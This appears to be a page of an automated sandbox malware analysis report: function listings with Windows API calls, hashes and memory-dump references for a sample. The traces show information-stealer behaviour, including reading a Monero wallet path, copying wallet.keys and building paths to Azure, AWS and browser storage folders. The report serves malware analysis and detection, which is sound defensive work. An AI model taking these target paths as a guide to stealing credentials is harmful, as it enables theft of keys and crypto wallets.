                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbcdf3c6315a3e1233da8d31e47c96b7691ace88c11bbdbca220a1c8c297464a
                                • Instruction ID: 0f7076ec7110edcc089407b2008d9cb8d1d9b6d6eb0feca798524379767bca44
                                • Opcode Fuzzy Hash: fbcdf3c6315a3e1233da8d31e47c96b7691ace88c11bbdbca220a1c8c297464a
                                • Instruction Fuzzy Hash: 1A415AB39182189BE7182D28DC997B7B799EB14320F1A423DEFD997780E979180486C6
                                Function 00C885B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C88636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 00C886AA
                                • StrStrA.SHLWAPI(?,0179E960), ref: 00C886CF
                                • lstrcpyn.KERNEL32(00EA93D0,?,00000000), ref: 00C886EE
                                • lstrlen.KERNEL32(?), ref: 00C88701
                                • wsprintfA.USER32 ref: 00C88711
                                • lstrcpy.KERNEL32(?,?), ref: 00C88727
                                • StrStrA.SHLWAPI(?,0179E978), ref: 00C88754
                                • lstrcpy.KERNEL32(?,00EA93D0), ref: 00C887B4
                                • StrStrA.SHLWAPI(?,0179EF30), ref: 00C887E1
                                • lstrcpyn.KERNEL32(00EA93D0,?,00000000), ref: 00C88800
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 497ff6d6e3d5077da7a26dc4b4683865da0d582b607c58a7dbcc556da8c52197
                                • Instruction ID: ede68cfb63babe9baafe27ebb24df74751c028298889b57a1e6f06b0ebb2a853
                                • Opcode Fuzzy Hash: 497ff6d6e3d5077da7a26dc4b4683865da0d582b607c58a7dbcc556da8c52197
                                • Instruction Fuzzy Hash: C8F18D75A01119EFCB10DB68DD48AEAB7B9EF89300F148559F909F7251DB30BE09DBA0
                                Function 00C71F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71F9F
                                • lstrlen.KERNEL32(01798908), ref: 00C71FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00C71FE3
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7200E
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C72042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7204D
                                • lstrlen.KERNEL32(00CA1794), ref: 00C72058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72075
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C72081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C720AC
                                • lstrlen.KERNEL32(?), ref: 00C720E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72104
                                • lstrcat.KERNEL32(00000000,?), ref: 00C72112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72139
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7216B
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C72177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C721A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C721D4
                                • lstrlen.KERNEL32(?), ref: 00C721EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7220A
                                • lstrcat.KERNEL32(00000000,?), ref: 00C72218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72242
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7227F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C7228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C722B1
                                • lstrcat.KERNEL32(00000000,0179D8B0), ref: 00C722B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C722F7
                                • lstrcat.KERNEL32(00000000), ref: 00C72304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C72356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C723BF
                                • DeleteFileA.KERNEL32(00000000), ref: 00C723F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C72444
                                • FindClose.KERNEL32(00000000), ref: 00C72453
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: 6100be7015bb4072cb895808c4853662c5a1afb521d996ce273808985b0df3df
                                • Instruction ID: 2ff32216470567cd20b778f6e12b60b3b846474e68fc3961fb9ceca750090f56
                                • Opcode Fuzzy Hash: 6100be7015bb4072cb895808c4853662c5a1afb521d996ce273808985b0df3df
                                • Instruction Fuzzy Hash: A3E13231A1121A9FCB21EFA5DD89A9E77F9EF55310F04C024F919E7212DB34EE059BA0
                                Function 00C86410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86445
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C864AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C864E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86537
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: b90d9b6351bbe67363aa947420adc2b4f0a098c79860a26728ae097013d4df66
                                • Instruction ID: 5c80251383525b9f8e0fc3810f387804671386eea3f2b9dbc2a766f275c35185
                                • Opcode Fuzzy Hash: b90d9b6351bbe67363aa947420adc2b4f0a098c79860a26728ae097013d4df66
                                • Instruction Fuzzy Hash: ACF18E70A012169FCB21FF69D849AAF77B5EF44308F088128F869E7252DB34DE45CB94
                                Function 00C84370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C843A3
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C843D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C843FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84409
                                • lstrlen.KERNEL32(\storage\default\), ref: 00C84414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00C8443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84498
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C844D7
                                • lstrcat.KERNEL32(00000000,?), ref: 00C844DF
                                • lstrlen.KERNEL32(00CA1794), ref: 00C844EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84507
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C84513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 00C8451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00C84547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C845A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C845A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84601
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84653
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8467B
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C846AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 0a2a1621def01499b0935c1aaddd8c8e2ae11d005f7c67f965c642ba91f7aa28
                                • Instruction ID: 3f040a66c92325ed1545d7ae45f1ab010951795f75dcaa32d3f0ab7afdcfeade
                                • Opcode Fuzzy Hash: 0a2a1621def01499b0935c1aaddd8c8e2ae11d005f7c67f965c642ba91f7aa28
                                • Instruction Fuzzy Hash: 75B19F30A112179FCB25FF79D849AAF77E8EF55318F098024B819E7252DB30EE059B94
                                Function 00C857A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C857D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00C85804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C85868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C858C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C858D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C858F8
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C85961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85988
                                • lstrlen.KERNEL32(00CA1794), ref: 00C8599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C859B9
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C859C5
                                • lstrlen.KERNEL32(0179D778), ref: 00C859D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C859F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C85A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C85A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85BB5
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C85BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85C70
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 4f7f81d8750f33a206605bb6ea13e9c8681ab96803d7e630e06b6871cb93b222
                                • Instruction ID: ec3d8f15e532d920fc3469d3ab5e116e719e815d6f097dd3a3ad302e903f9601
                                • Opcode Fuzzy Hash: 4f7f81d8750f33a206605bb6ea13e9c8681ab96803d7e630e06b6871cb93b222
                                • Instruction Fuzzy Hash: 3702B171A016059FCB21FF69C889AAF7BF5EF48304F088128F819A7251DB74EE45DB94
                                Function 00C71190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C71120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C71135
                                  • Part of subcall function 00C71120: RtlAllocateHeap.NTDLL(00000000), ref: 00C7113C
                                  • Part of subcall function 00C71120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00C71159
                                  • Part of subcall function 00C71120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00C71173
                                  • Part of subcall function 00C71120: RegCloseKey.ADVAPI32(?), ref: 00C7117D
                                • lstrcat.KERNEL32(?,00000000), ref: 00C711C0
                                • lstrlen.KERNEL32(?), ref: 00C711CD
                                • lstrcat.KERNEL32(?,.keys), ref: 00C711E8
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7121F
                                • lstrlen.KERNEL32(01798908), ref: 00C7122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71251
                                • lstrcat.KERNEL32(00000000,01798908), ref: 00C71259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00C71264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00C71294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C712BA
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C712FF
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C7130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71335
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71378
                                • lstrcat.KERNEL32(00000000), ref: 00C71385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C713AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00C713D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71401
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7143D
                                  • Part of subcall function 00C8EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00C8EE12
                                • DeleteFileA.KERNEL32(?), ref: 00C71471
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: 0e728b4456904bac31a22fdbe2988775550d170b032af854edd46577afe10d95
                                • Instruction ID: 13b5cc54a91286783329abb221d261acd85ecd11af1a02f4de18b27ce3b20bc0
                                • Opcode Fuzzy Hash: 0e728b4456904bac31a22fdbe2988775550d170b032af854edd46577afe10d95
                                • Instruction Fuzzy Hash: C9A17471A112069FCB21EFB9DD89A9F77B9EF45350F088024F919E7252DB30EE059B90
                                Function 00C8E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00C8E740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00C8E769
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E79F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00C8E7C6
                                • memset.MSVCRT ref: 00C8E805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00C8E82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E85F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00C8E886
                                • memset.MSVCRT ref: 00C8E8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00C8E8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E920
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C8E947
                                • memset.MSVCRT ref: 00C8E986
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
